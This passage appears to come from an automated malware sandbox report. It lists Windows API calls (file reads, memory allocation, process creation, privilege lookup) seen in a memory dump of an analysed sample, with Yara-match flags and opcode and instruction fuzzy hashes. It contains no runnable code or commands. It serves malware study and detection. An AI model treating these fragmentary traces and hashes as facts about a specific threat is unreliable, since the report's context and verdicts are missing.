                                                        • Instruction Fuzzy Hash: DB0180B5200148ABCB08CF98D984CE777ADFF8C714B14874EFD5D87201C635E8558BA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • NtCreateFile.NTDLL(00000060,00000000,.z`,02454B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02454B87,007A002E,00000000,00000060,00000000,00000000), ref: 02459D8D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.495031806.0000000002440000.00000040.00000001.sdmp, Offset: 02440000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID: .z`
                                                        • API String ID: 823142352-1441809116
                                                        • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                        • Instruction ID: 44fdf471e990adcdd8dac71b0b8fd6182ffe86301801bec4428b4e8414ef8946
                                                        • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                        • Instruction Fuzzy Hash: C9F0BDB2200218ABCB08CF89DC84EEB77ADAF8C754F158248BA0D97241C630E8118BA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • NtReadFile.NTDLL(02454D42,5EB6522D,FFFFFFFF,02454A01,?,?,02454D42,?,02454A01,FFFFFFFF,5EB6522D,02454D42,?,00000000), ref: 02459E35
                                                        • NtClose.NTDLL(02454D20,?,?,02454D20,00000000,FFFFFFFF), ref: 02459E95
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.495031806.0000000002440000.00000040.00000001.sdmp, Offset: 02440000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CloseFileRead
                                                        • String ID:
                                                        • API String ID: 752142053-0
                                                        • Opcode ID: 2c757cb87de35fde1d599b3cba0ad61d74998fdb3d1e035843da671c9cb999f3
                                                        • Instruction ID: e60144c092cdf0e265a2c3c27e48ce3c410918cab0f2cf29dea7241ae347d9de
                                                        • Opcode Fuzzy Hash: 2c757cb87de35fde1d599b3cba0ad61d74998fdb3d1e035843da671c9cb999f3
                                                        • Instruction Fuzzy Hash: 8D01F672205154AFDB14DF99DC84DAB7BA9EF8C320B148989FA9C8B241D630E8118BA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • NtReadFile.NTDLL(02454D42,5EB6522D,FFFFFFFF,02454A01,?,?,02454D42,?,02454A01,FFFFFFFF,5EB6522D,02454D42,?,00000000), ref: 02459E35
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.495031806.0000000002440000.00000040.00000001.sdmp, Offset: 02440000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID: FileRead
                                                        • String ID:
                                                        • API String ID: 2738559852-0
                                                        • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                        • Instruction ID: 20edc4257254ae4a9a2d5c29f60318fcbdf1c3d65554fd266961b72d7a2b67ef
                                                        • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                        • Instruction Fuzzy Hash: 7FF0A4B2200218ABCB14DF89DC80EEB77ADAF8C754F158649BE5D97241D630E8118BA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02442D11,00002000,00003000,00000004), ref: 02459F59
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.495031806.0000000002440000.00000040.00000001.sdmp, Offset: 02440000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AllocateMemoryVirtual
                                                        • String ID:
                                                        • API String ID: 2167126740-0
                                                        • Opcode ID: 7b47bc396b877d74e85339fc7e7217a4f0b6ed5df04105bd6a21854bb6658c01
                                                        • Instruction ID: 66eb74a23769c232b760559b45120bcfa710cc1092033f0eadbedc19b9444b3c
                                                        • Opcode Fuzzy Hash: 7b47bc396b877d74e85339fc7e7217a4f0b6ed5df04105bd6a21854bb6658c01
                                                        • Instruction Fuzzy Hash: 8FF030B51101596BCB15DFA9DC84CE777A9FF88210B15875EFD8D97203C634D815CBA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02442D11,00002000,00003000,00000004), ref: 02459F59
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.495031806.0000000002440000.00000040.00000001.sdmp, Offset: 02440000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AllocateMemoryVirtual
                                                        • String ID:
                                                        • API String ID: 2167126740-0
                                                        • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                        • Instruction ID: 608ddeafd5f463e2357f4a6b05d6e739037a95b82758897f5b065a67b3c863a2
                                                        • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                        • Instruction Fuzzy Hash: B8F015B2200218ABCB14DF89CC80EAB77ADAF88750F118649BE4897241C630F810CBA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • NtClose.NTDLL(02454D20,?,?,02454D20,00000000,FFFFFFFF), ref: 02459E95
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.495031806.0000000002440000.00000040.00000001.sdmp, Offset: 02440000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Close
                                                        • String ID:
                                                        • API String ID: 3535843008-0
                                                        • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                        • Instruction ID: 35b9d6603f99eef8a9160e374fea70635cf6070ed04f56b9c1342d2151bcca84
                                                        • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                        • Instruction Fuzzy Hash: DAD01776200224ABD710EB99CC85EA77BADEF48760F154599BA589B242C530FA008AE0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • NtClose.NTDLL(02454D20,?,?,02454D20,00000000,FFFFFFFF), ref: 02459E95
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.495031806.0000000002440000.00000040.00000001.sdmp, Offset: 02440000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Close
                                                        • String ID:
                                                        • API String ID: 3535843008-0
                                                        • Opcode ID: 3c78ceb43e6cdc76ac1166f8372471bd331b1f97073699544e84645fbf8259dd
                                                        • Instruction ID: 515fa3320c8aff51f6dfec119b87702129f9bccc757ba6a908846f676c804a77
                                                        • Opcode Fuzzy Hash: 3c78ceb43e6cdc76ac1166f8372471bd331b1f97073699544e84645fbf8259dd
                                                        • Instruction Fuzzy Hash: 57C08C731042004EC7009B9898808D27320DAC1214315C897E89C8B202E1308B108A90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.496085261.0000000004410000.00000040.00000001.sdmp, Offset: 04410000, based on PE: true
                                                        • Associated: 0000000C.00000002.496600844.000000000452B000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.496631486.000000000452F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 6d830cbb0129d229754d522741136ed810907d07fa174ef7f516acf10df55434
                                                        • Instruction ID: 6a8bc3fa82da60a46a530cd8c61adac4d2e5fffee8925ef34a687d7ece8f0d05
                                                        • Opcode Fuzzy Hash: 6d830cbb0129d229754d522741136ed810907d07fa174ef7f516acf10df55434
                                                        • Instruction Fuzzy Hash: FC9002A1A43041527945B159840490B4006A7F0285791C017E1405954C866AE856E661
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.496085261.0000000004410000.00000040.00000001.sdmp, Offset: 04410000, based on PE: true
                                                        • Associated: 0000000C.00000002.496600844.000000000452B000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.496631486.000000000452F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 329a2e4e8091975a2e41d043eab9f6e16a0759fa3435fe52d3c45a54b1586056
                                                        • Instruction ID: 62435d70b98f836dcf80fd804676ff570e555444756513dab108fe2608a17c5a
                                                        • Opcode Fuzzy Hash: 329a2e4e8091975a2e41d043eab9f6e16a0759fa3435fe52d3c45a54b1586056
                                                        • Instruction Fuzzy Hash: 879002B1A0200413F51171598504B0B000997E0285F91C417E041555CD979AD952B161
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.496085261.0000000004410000.00000040.00000001.sdmp, Offset: 04410000, based on PE: true
                                                        • Associated: 0000000C.00000002.496600844.000000000452B000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.496631486.000000000452F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 1ddf0e196008e78eddfe43bcf86390c0ad3851e2974719cf995a50af67f55a56
                                                        • Instruction ID: 25854b0b8d1deee2f8becfdf3e8d12c713dcd7bb91374b2591a424b5721ce167
                                                        • Opcode Fuzzy Hash: 1ddf0e196008e78eddfe43bcf86390c0ad3851e2974719cf995a50af67f55a56
                                                        • Instruction Fuzzy Hash: 0E9002A5A12000032505B559470490B004697E5395351C026F1006554CD765D8616161
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.496085261.0000000004410000.00000040.00000001.sdmp, Offset: 04410000, based on PE: true
                                                        • Associated: 0000000C.00000002.496600844.000000000452B000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.496631486.000000000452F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 2d9b9a5ad96abd35a4f61c010e5ea5e339c984a84fb2d89e15bee94e6eabef91
                                                        • Instruction ID: d2e8219d2408e192d895e8cc01c7d3351ec02bd1baeb8e6496091aeeb68956f8
                                                        • Opcode Fuzzy Hash: 2d9b9a5ad96abd35a4f61c010e5ea5e339c984a84fb2d89e15bee94e6eabef91
                                                        • Instruction Fuzzy Hash: 4A9002F1A0200402F54071598404B4A000597E0345F51C016E5055558E879DDDD576A5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.496085261.0000000004410000.00000040.00000001.sdmp, Offset: 04410000, based on PE: true
                                                        • Associated: 0000000C.00000002.496600844.000000000452B000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.496631486.000000000452F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: aff7b9eb3586ae7aa847cdb1170088fbe3dd3523f5fd2683ae543eeaf690dbe2
                                                        • Instruction ID: c339d4c8c97a4b88c6520bad80b0b1d19dddd022c79fe5d5c168e466d476648c
                                                        • Opcode Fuzzy Hash: aff7b9eb3586ae7aa847cdb1170088fbe3dd3523f5fd2683ae543eeaf690dbe2
                                                        • Instruction Fuzzy Hash: EA9002E1A0300003650571598414A1A400A97F0245B51C026E1005594DC669D8917165
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.496085261.0000000004410000.00000040.00000001.sdmp, Offset: 04410000, based on PE: true
                                                        • Associated: 0000000C.00000002.496600844.000000000452B000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.496631486.000000000452F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: f918b086e1515fa149a44fc33620377cb6465d567301789a55a8c604f7c22f3f
                                                        • Instruction ID: 622d48a62d56f842993ab99418b6872dcddc8964fbe7a150500696cb289de61a
                                                        • Opcode Fuzzy Hash: f918b086e1515fa149a44fc33620377cb6465d567301789a55a8c604f7c22f3f
                                                        • Instruction Fuzzy Hash: 2D9002E1B4200442F50071598414F0A0005D7F1345F51C01AE1055558D875DDC527166
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.496085261.0000000004410000.00000040.00000001.sdmp, Offset: 04410000, based on PE: true
                                                        • Associated: 0000000C.00000002.496600844.000000000452B000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.496631486.000000000452F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 20380c9e9e146a48e9fc4cef8803ca94619ad961d7871dc607b12598684428df
                                                        • Instruction ID: 7a12b67ddab4c685899aa4434969cf76edf15a34fb0a6d2dfa089d28bfa8a8df
                                                        • Opcode Fuzzy Hash: 20380c9e9e146a48e9fc4cef8803ca94619ad961d7871dc607b12598684428df
                                                        • Instruction Fuzzy Hash: E19002B1A0604842F54071598404E4A001597E0349F51C016E0055698D9769DD55B6A1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.496085261.0000000004410000.00000040.00000001.sdmp, Offset: 04410000, based on PE: true
                                                        • Associated: 0000000C.00000002.496600844.000000000452B000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.496631486.000000000452F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 9fb0d492986844e645ea542bcd07c3a9b66f4340bbd6d730eb262893ea10f301
                                                        • Instruction ID: 6171155117bfeba4d637a41c5cdc5bb2c99b1c86dad1654c02d14e5b99da8418
                                                        • Opcode Fuzzy Hash: 9fb0d492986844e645ea542bcd07c3a9b66f4340bbd6d730eb262893ea10f301
                                                        • Instruction Fuzzy Hash: E69002A1A1280042F60075698C14F0B000597E0347F51C11AE0145558CCA59D8616561
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.496085261.0000000004410000.00000040.00000001.sdmp, Offset: 04410000, based on PE: true
                                                        • Associated: 0000000C.00000002.496600844.000000000452B000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.496631486.000000000452F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 6ce7e07316a6a9ba94e582784b51a3ef6ceb41c6713798f66c0ac44c8cc779e7
                                                        • Instruction ID: 60d85c9b187e2ba577472cf468c5dc8df35fe0c1a050a417be2275b4d6a09059
                                                        • Opcode Fuzzy Hash: 6ce7e07316a6a9ba94e582784b51a3ef6ceb41c6713798f66c0ac44c8cc779e7
                                                        • Instruction Fuzzy Hash: 389002B1A0200802F58071598404A4E000597E1345F91C01AE0016658DCB59DA5977E1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.496085261.0000000004410000.00000040.00000001.sdmp, Offset: 04410000, based on PE: true
                                                        • Associated: 0000000C.00000002.496600844.000000000452B000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.496631486.000000000452F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: ff87f9a20b94199c0068ffe4e724bf2f90bf3c3502252219e8f797949317e384
                                                        • Instruction ID: ceab0b7114527c180aa9941c8aa1d651ca48c6b4b4cf47fe8f2d1aeb5bce9b29
                                                        • Opcode Fuzzy Hash: ff87f9a20b94199c0068ffe4e724bf2f90bf3c3502252219e8f797949317e384
                                                        • Instruction Fuzzy Hash: 259002B1A0200842F50071598404F4A000597F0345F51C01BE0115658D8759D8517561
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.496085261.0000000004410000.00000040.00000001.sdmp, Offset: 04410000, based on PE: true
                                                        • Associated: 0000000C.00000002.496600844.000000000452B000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.496631486.000000000452F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 512a4ebec7f6492c159260370c50ed46f7e65e298822427f5d9c71c365a57cd1
                                                        • Instruction ID: 16e70616a41e19cdcfe40cceadafe7261ad661d366066f726d6bbaf74c245d62
                                                        • Opcode Fuzzy Hash: 512a4ebec7f6492c159260370c50ed46f7e65e298822427f5d9c71c365a57cd1
                                                        • Instruction Fuzzy Hash: 8C9002B1A0208802F5107159C404B4E000597E0345F55C416E441565CD87D9D8917161
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.496085261.0000000004410000.00000040.00000001.sdmp, Offset: 04410000, based on PE: true
                                                        • Associated: 0000000C.00000002.496600844.000000000452B000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.496631486.000000000452F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 8aa5c1d4ff7883a6cb09e4324dde3c9ce9629f1f2a25ac75b34fd4a7352be4d4
                                                        • Instruction ID: 14f3254150f1a38f278bad61f68470947f4bc3922214a73087232847030cf316
                                                        • Opcode Fuzzy Hash: 8aa5c1d4ff7883a6cb09e4324dde3c9ce9629f1f2a25ac75b34fd4a7352be4d4
                                                        • Instruction Fuzzy Hash: B19002B1A0200402F50075999408A4A000597F0345F51D016E5015559EC7A9D8917171
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.496085261.0000000004410000.00000040.00000001.sdmp, Offset: 04410000, based on PE: true
                                                        • Associated: 0000000C.00000002.496600844.000000000452B000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.496631486.000000000452F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: cc44a730aa11e294f56838f708e58b1d300cc40b5485d1e4fe915c5cb5c86679
                                                        • Instruction ID: 046875a2af4da5f745986d3ff80a18d682ffdf5539a2856ffff6eb026109585e
                                                        • Opcode Fuzzy Hash: cc44a730aa11e294f56838f708e58b1d300cc40b5485d1e4fe915c5cb5c86679
                                                        • Instruction Fuzzy Hash: 429002B1B1214402F5107159C404B0A000597E1245F51C416E081555CD87D9D8917162
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.496085261.0000000004410000.00000040.00000001.sdmp, Offset: 04410000, based on PE: true
                                                        • Associated: 0000000C.00000002.496600844.000000000452B000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.496631486.000000000452F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 9daad6b14079918f226888b53081c65415f4b81c5058e322a488dfc56720403d
                                                        • Instruction ID: c923951a4b07bcf7c8b5831fc7f34386d223c660122f4c1564ee1d2b77944186
                                                        • Opcode Fuzzy Hash: 9daad6b14079918f226888b53081c65415f4b81c5058e322a488dfc56720403d
                                                        • Instruction Fuzzy Hash: 5C9002A9A1300002F58071599408A0E000597E1246F91D41AE000655CCCA59D8696361
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02443AF8), ref: 0245A07D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.495031806.0000000002440000.00000040.00000001.sdmp, Offset: 02440000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID: FreeHeap
                                                        • String ID: .z`$}>|2
                                                        • API String ID: 3298025750-26112343
                                                        • Opcode ID: 7e62f351ab6f0bae52cd4e33778da8d85c9cee534dbade49ef896c04c033e8bf
                                                        • Instruction ID: aee39d670ad14b017b876a266474a7b0f05e7295417b84b0b879e458f9b8670d
                                                        • Opcode Fuzzy Hash: 7e62f351ab6f0bae52cd4e33778da8d85c9cee534dbade49ef896c04c033e8bf
                                                        • Instruction Fuzzy Hash: 51E06DB22002246BD718DF59CC84ED7379AAF88360F214665FD599B242C631E801CBA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02443AF8), ref: 0245A07D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.495031806.0000000002440000.00000040.00000001.sdmp, Offset: 02440000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID: FreeHeap
                                                        • String ID: .z`
                                                        • API String ID: 3298025750-1441809116
                                                        • Opcode ID: b7f017036a826d5a203e103d8b19d66928685623490a8dc0b1bbda4154f460c2
                                                        • Instruction ID: 781468f5d98390b579172d05d9d9debfb39b16207a3113e02c5a07eaad386ef2
                                                        • Opcode Fuzzy Hash: b7f017036a826d5a203e103d8b19d66928685623490a8dc0b1bbda4154f460c2
                                                        • Instruction Fuzzy Hash: 91014FB52002246BD725DF99CC84ED73769EF88360F05855AFD4CAF242C631E911CBE0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02443AF8), ref: 0245A07D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.495031806.0000000002440000.00000040.00000001.sdmp, Offset: 02440000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID: FreeHeap
                                                        • String ID: .z`
                                                        • API String ID: 3298025750-1441809116
                                                        • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                        • Instruction ID: b738aa832221b831d5aee0594c5b8fc6a9b30ccdbebb907a15b041b06768011d
                                                        • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                        • Instruction Fuzzy Hash: 22E04FB12002146BD714DF59CC44EA777ADEF88750F014559FD4857241C630F910CAF0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0244834A
                                                        • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0244836B
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.495031806.0000000002440000.00000040.00000001.sdmp, Offset: 02440000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID: MessagePostThread
                                                        • String ID:
                                                        • API String ID: 1836367815-0
                                                        • Opcode ID: 940853e3a3de7068200916c3390945410f297f43105f1bb9aca6c1d1d9715481
                                                        • Instruction ID: ff8a69fe9163310a818d4d8ea8698d4cf70c162f08ed9f63ba9e12a744646da9
                                                        • Opcode Fuzzy Hash: 940853e3a3de7068200916c3390945410f297f43105f1bb9aca6c1d1d9715481
                                                        • Instruction Fuzzy Hash: E701D431A802287AF721AA949C42FFF772CAB41B55F05005EFF44BA1C1DBA526068BE5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0244834A
                                                        • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0244836B
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.495031806.0000000002440000.00000040.00000001.sdmp, Offset: 02440000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID: MessagePostThread
                                                        • String ID:
                                                        • API String ID: 1836367815-0
                                                        • Opcode ID: d7fc8d31e38636ca33da074b6bee99654eac210a5987a8a92c404cd6e6003fb7
                                                        • Instruction ID: 561abf002cde012ebcdc7068b60104cd6131979ee92894324ef92e99820cf844
                                                        • Opcode Fuzzy Hash: d7fc8d31e38636ca33da074b6bee99654eac210a5987a8a92c404cd6e6003fb7
                                                        • Instruction Fuzzy Hash: 8A01A231A802287BF721A6959C42FBF776CAB40B55F04411AFF04BA1C1EAD56A064BF5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0244834A
                                                        • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0244836B
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.495031806.0000000002440000.00000040.00000001.sdmp, Offset: 02440000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID: MessagePostThread
                                                        • String ID:
                                                        • API String ID: 1836367815-0
                                                        • Opcode ID: 85891a1c77872cb6095ff2784df8837a8a5cf9f5852ec55473743326e542bcd6
                                                        • Instruction ID: 4f849d377811b23d01ad478771885f63ad31f3b75304a5078c6aa30e7c2c5438
                                                        • Opcode Fuzzy Hash: 85891a1c77872cb6095ff2784df8837a8a5cf9f5852ec55473743326e542bcd6
                                                        • Instruction Fuzzy Hash: 8EF0E222B806283AF62515855C13FBE675C9B41F55F29001BFF00FE1C1EAC529060AE1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0245A114
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.495031806.0000000002440000.00000040.00000001.sdmp, Offset: 02440000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateInternalProcess
                                                        • String ID:
                                                        • API String ID: 2186235152-0
                                                        • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                        • Instruction ID: d82c3887f2b456129227f87408b203db60f1fe6ef4057605504498970a67f2b3
                                                        • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                        • Instruction Fuzzy Hash: 9301B2B2210118BFCB54DF89DC80EEB77ADAF8C754F158258FA4D97241C630E851CBA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,0244F1A2,0244F1A2,?,00000000,?,?), ref: 0245A1E0
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.495031806.0000000002440000.00000040.00000001.sdmp, Offset: 02440000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID: LookupPrivilegeValue
                                                        • String ID:
                                                        • API String ID: 3899507212-0
                                                        • Opcode ID: abcd0cedf77ca022b3db242d0821c9056cf916417da9e1a1b39dc6091bae3be7
                                                        • Instruction ID: 751e026a5afdd38b5bfd7044fe6e1ea94854ea13581b38b8044200335c212626
                                                        • Opcode Fuzzy Hash: abcd0cedf77ca022b3db242d0821c9056cf916417da9e1a1b39dc6091bae3be7
                                                        • Instruction Fuzzy Hash: 60F0E5B13006146FC720DF68DC40FE73BA99F89210F058699FD8997341C531E8008BA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • RtlAllocateHeap.NTDLL(02454506,?,02454C7F,02454C7F,?,02454506,?,?,?,?,?,00000000,00000000,?), ref: 0245A03D
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.495031806.0000000002440000.00000040.00000001.sdmp, Offset: 02440000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AllocateHeap
                                                        • String ID:
                                                        • API String ID: 1279760036-0
                                                        • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                        • Instruction ID: fa950589cd1c0d1b3676ce518450bdb6bef2215275b2ddefd1a7fe96eee3bb03
                                                        • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                        • Instruction Fuzzy Hash: F8E012B1200228ABDB14EF99CC40EA777ADAF88660F118559BE485B242C630F9108AB0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,0244F1A2,0244F1A2,?,00000000,?,?), ref: 0245A1E0
                                                        Memory Dump Source
